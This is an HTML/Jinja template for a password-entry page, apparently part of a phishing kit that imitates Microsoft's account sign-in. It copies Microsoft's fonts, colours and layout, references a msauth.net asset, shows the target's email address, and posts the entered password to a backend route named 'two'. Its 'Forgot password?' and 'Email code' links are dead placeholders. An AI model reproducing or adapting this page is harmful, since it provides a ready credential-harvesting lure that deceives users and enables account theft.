<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <div class="logo">
        <img src="{{ url_for('static', filename='logo2.png') }}">
    </div>
    

    <p>{{ user_email }}</p>
    <br>
    <h5>Enter password</h5>

    <form action="{{ url_for('two', username=user_email) }}" method="POST">
        <input class="email" type="password" name="password" id="" placeholder="Password"><br>
        <p><a href="#">Forgot password?</a></p>
        <p><a href="#">Email code to {{ user_email }}</a></p>
        <input class="submit" type="submit" value="Sign in">
    </form>
    <br><br><br><br><br>

    <!-- <button class="btn"><a  href="#"><img class="tile-img medium" src="https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg" alt=""> <span class="link">Sign-in options</span></a></button> -->



    <style>
        body{
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            background-color: #fff;
            font-family: "Segoe UI Webfont", -apple-system, "Helvetica Neue", "Lucida Grande", "Roboto", "Ebrima", "Nirmala UI", "Gadugi", "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", "Tunga", "Lao UI", "Raavi", "Iskoola Pota", "Latha", "Leelawadee", "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";;
        }

        img{
            margin-right: 90px;
            /* border: 1px solid red; */
            height: 60px;
            margin-left: 15px;
            /* margin-top: -25px; */
        }

        h5{
            font-family: "Segoe UI", "Helvetica Neue", "Lucida Grande", "Roboto", "Ebrima", "Nirmala UI", "Gadugi", "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", "Tunga", "Lao UI", "Raavi", "Iskoola Pota", "Latha", "Leelawadee", "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
            color: rgb(27, 27, 27);
            font-size: 1.5rem;
            font-weight: 600;
            margin-top: -10px;
            margin-left: 22px;
           
        }

        .email {
    padding-bottom: 10px;
    border: (0, 0, 0, 0.8);
    border-top: none;
    border-left: none;
    border-right: none;
    margin-left: 22px;
    margin-top: -20px;
    /* border: 1px solid red; */
    width: 350px;
    font-size: inherit;
    position: absolute;
    font-family: inherit;
}

.email:focus {
    outline: none; /* Remove the default focus outline */
    border-bottom: 1px solid rgb(187, 185, 185); /* Add bottom border when focused */
}


        p{
            margin-left: 22px;
            font-size: 14px;
        }
        a{
            text-decoration: none;
            color: #0067b8;
            font-size: .8125rem;;
            font-weight: 400;
    font-family: "Segoe UI", -apple-system, "Helvetica Neue", "Lucida Grande", Roboto, Ebrima, "Nirmala UI", Gadugi, "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", Tunga, "Lao UI", Raavi, "Iskoola Pota", Latha, Leelawadee, "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
    font-size: 0.9375rem;
    line-height: 1.25rem;

        }

        .submit{
            font-family: inherit;
            font-size: inherit;
            color: #fff;
            border-color: rgb(0, 103, 184);
            background-color: #0067b8;
            padding: 5px 38px;
            border: none;
            float: right;
            margin-right: 50px;
            margin-top: 15px;
            padding-top: 6px;
            padding-bottom: 6px;
            padding-left: 35px;
            padding-right: 35px;

        }

        .tile-img.medium {
        width: 32px;
        height: 32px;
        padding-right: 280px;
        }

        .btn{
            margin-left: 22px; 
            width: 360px;
            background-color: white;
            border: 1px solid rgb(175, 175, 175);
            height: 48px;
        }

         .link{
            font-size: .8125rem;;
            font-family: "Segoe UI", "Helvetica Neue", "Lucida Grande", "Roboto", "Ebrima", "Nirmala UI", "Gadugi", "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", "Tunga", "Lao UI", "Raavi", "Iskoola Pota", "Latha", "Leelawadee", "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
            color: #1b1b1b;
            margin-top: -28px;
            margin-left: -110px;
            position: absolute;
        }
    </style>
</body>
</html>